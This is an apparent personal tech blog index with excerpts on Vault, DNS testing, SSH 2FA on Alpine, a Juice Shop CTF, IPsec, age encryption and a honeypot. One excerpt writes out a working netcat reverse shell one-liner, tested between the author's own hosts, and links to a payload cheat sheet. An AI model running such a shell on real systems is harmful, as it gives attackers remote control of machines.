Security

some Hands’on with Hashicorp Vault Source https://developer.hashicorp.com/vault/docs/get-started/developer-qs Install on macos brew tap hashicorp/tap brew install hashicorp/tap/vault Run on Docker in Background, you have to kill it later docker run -d -p 8200:8200 -e 'VAULT_DEV_ROOT_TOKEN_ID=dev-only-token' vault Unseal Key: 2KTIMp0Md52V2xTb0txxxxxxxxxxxxxxxxxxxxxxxxx= Root Token: dev-only-token this is a dev instance only and has no persistent data. don’t worry. Open Browser http://localhost:8200 -> root token Export in Terminal export VAULT_ADDR='http://0.0.0.0:8200' export VAULT_TOKEN="dev-only-token" Set Key curl --header "X-Vault-Token: $VAULT_TOKEN" \ --header "Content-Type: application/json" \ --request POST \ --data '{"data": {"password": "Hashi123"}}' \ -s http://127.

Reverse Shells https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://kb.systemoverlord.com/security/postex/reverse/ Test it Listen on Host A Set Lister on Host A (192.168.1.100) hostA # nc -l 4242 Start Reverse Shell on Host B hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f here we are hostA # hostname hostA.somewhere hostA # nc -l 4242 hostB # hostname hostB.somewhere nice ;) sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3

Talk from @mwl at BSDCAN 2022 https://www.youtube.com/watch?v=1n62VZj-CKI OARC Reply Size Tester dig +short rs.dns-oarc.net TXT Host1 - good :) # dig +short rs.dns-oarc.net TXT rst.x4090.rs.dns-oarc.net. rst.x4058.x4090.rs.dns-oarc.net. rst.x4064.x4058.x4090.rs.dns-oarc.net. "45.15.80.80 DNS reply size limit is at least 4090" "45.15.80.80 sent EDNS buffer size 4096" Host2 - bad :( # dig +short rs.dns-oarc.net TXT rst.x1196.rs.dns-oarc.net. rst.x1206.x1196.rs.dns-oarc.net. rst.x1204.x1206.x1196.rs.dns-oarc.net. "74.63.25.240 DNS reply size limit is at least 1206" "74.63.25.240 sent EDNS buffer size 1232" sha256: 110b220f93eff767b7e4d488294b00ede4f4509258d0148704b145df79fa9821

Intro I never used the Fulldisk Encryption Feature as there was no need for. It doesn’t make sense for Hosted VM’s, as you have to enter the Passphrase at every boot at the Console. So, it’s a pain and still possible to intercept on the Hosters Infrastructure. Disk Encryption does not make sense at home, as all my Devices remains at home (and hopefully never got stolen). It would make sense on a Notebook, but i’m more the Apple Fanboy when it comes to portable Machines.

Let’s give a try with Alpine Linux, OpenSSH and 2FA with Google Authenticator. add Packages apk add openssh openssh-server-pam google-authenticator openssh-doc google-authenticator-doc libqrencode Configure GoogleAuth touch /etc/pam.d/sshd ln /etc/pam.d/sshd /etc/pam.d/sshd.pam cat << 'EOF' >> /etc/pam.d/sshd.pam account include base-account auth required pam_env.so auth required pam_nologin.so successok auth required /lib/security/pam_google_authenticator.so echo_verification_code grace_period=57600 nullok auth required pam_unix.so md5 sha512 EOF update sshd_config cat << 'EOF' >> /etc/ssh/sshd_config PasswordAuthentication no AuthenticationMethods any UsePAM yes EOF Restart SSHD service sshd restart Setup User su - USERNAME google-authenticator Response

Intro I stumbled across an old Cisco box in the basement. I thought i might have some fun (or frust?) with the aging Device. The Hardware still works fine, right ? And what about the Software ? Let’s give a try ! Hardware show version Cisco 1841 (revision 7.0) with 352256K/40960K bytes of memory. Processor board ID FCZ1234757Y 6 FastEthernet interfaces 1 Virtual Private Network (VPN) Module DRAM configuration is 64 bits wide with parity disabled.

If you ever wanna run a Multiplayer OWASP Juice Shop CTF on your own, here are some Notes and Info for bloody beginners References https://github.com/iteratec/multi-juicer/ https://www.digitalocean.com/ https://kubernetes.io/de/docs/concepts/overview/what-is-kubernetes/ Prerequisite you’ve got a Digital Ocean Account (or some other Cloud Provider) a spare domain and set the NS of DigitalOcean Digital Ocean CMD Line Tools installed and configured helm tools (kubernetes package manager -> brew install helm) some budget (~2 CHF/Day) 30min for Setup btw.

Area41 Looking Forward to the next Security Congress in Zurich https://www.area41.io . It’s sold out since a while, happy i got a early ticket :) … and all the Talks are online … https://www.youtube.com/watch?v=Hs5olUBX2cg&list=PLv-PXy2JVviu32C4U6F8KHKcyL4s-i_Fo sha256: 07f41198ed084963405456466b567179077366052c560295e9868a0046f0a714

How to enable Logging with Headers for Nginx Assuming you have a running setup and you want to enable logging with headers for debug and learning purposes ? Add Lua doas pkg_add nginx-lua-- and you get … doas pkg_info -L nginx-lua-- Information for inst:nginx-lua-1.20.1p0 Files: /var/www/modules/ndk_http_module.so /var/www/modules/ngx_http_lua_module.so Enable Modules in /etc/nginx/nginx.conf add two lines on Top load_module "modules/ndk_http_module.so"; load_module "modules/ngx_http_lua_module.so"; Enhance Logging add the following to the “http” Section log_format log_req_resp '$remote_addr - $remote_user [$time_local] ' '"$request" $status $body_bytes_sent ' '"$http_referer" "$http_user_agent" ' '$request_time req_header:"$req_header" ' 'resp_header:"$resp_header"'; Enable Logging add the following lines to your virtual Host Section

Environment OpenBSD 7.0 Debian 11.2 with Strongswan IPv4 only IKE v1 ToDo IPv6 and Dualstack IKE v2 Debian ipsec.conf conn puffy authby = secret ike = aes256-sha256-modp2048 keyexchange = ikev1 ikelifetime = 1h keyingtries = 0 left = %defaultroute right = 193.xx.xx.xx leftid = 212.xx.xx.xx rightid = 193.xx.xx.xx lifetime = 1200s leftsubnet = 10.11.1.8/30 rightsubnet = 10.1.6.0/24 esp = aes256-sha256-modp2048 dpddelay = 30 dpdtimeout = 120 dpdaction = restart auto = start OpenBSD /etc/sysctl.

Stumbled upon something that I’ve missed for a long time: encrypting files with the ssh public key :) Source https://github.com/FiloSottile/age Install Package OpenBSD (and most others *nix systems) got a package for age. Just install it. doas pkg_add age Asymmetric Encryption Asymmetric Encryption encrypts and decrypts the data using two separate yet mathematically connected cryptographic keys. These keys are known as a ‘Public Key’ and a ‘Private Key’. Together, they’re called a ‘Public and Private Key Pair’

it’s time for some education and i decided to do a CAS CyberSecurity @OST (prev. HSR Rapperswil). I expect to learn a lot in Attacking, Defense, Reverse Engineering and so on. Think i have already a “good basic” in many of these Topics. So, i expect the have an intersting Time in the next few Month. You can expect some posts here, or may i do another blog ? -> started a new blog for the CAS

i like to run honeypots … ok, to be honest, it’s not a honeypot. It’s a productive maschine for me, but all the bots trying to get in get’s redirected to a Honeypot, the credentials were captured and last but not least, you can watch them live in your browser :) http://honeypot.nolink.ch btw. 100k failed login attempts in 10 Day … have fun ! sha256: 8ae49e2283f894d5ab59ec16309f4f1d4aa547c0fd90705f969bae0d20d3b6f2

Resource Public Key Infrastructure you may know what RPKI is … It’s a PKI Framework for improving Security for the Internet Routing Infrastructure based on BGP. As a HomeUser or Small/Medium Size Company, you normally don’t have a Full BGP Table and multipe Upstream Providers. You have one Internet Router or Firewall and you get a Default Route from your ISP. With OpenBGPD and the current rpki extensions, you “just” need a Full BGP Feed and then, you can filter all invalid ROA’s and keep your Routing (and Internet Access) more Secure.

some cool Movies/Audios from “Remote Chaos Experience” RC3 RC3 Video, ordered by ViewCount Amateurfunk hacken Spot the Surveillance DevOps Disasters 3.1 Elektrogruselkabinet Indien-Edition 36C3 - Boeing 737MAX: Automated Crashes 36C3 - BahnMining - Pünktlichkeit ist eine Zier 36C3 - Finfisher verklagen 36C3 - Hirne Hacken 35C3 - Du kannst alles hacken – du darfst dich nur nicht erwischen lassen 35C3 - Hackerethik - eine Einführung sha256: ec267b020ffdde11711eff23057df1a9b74a0fed1c262c0ab9dd28b5c08d512e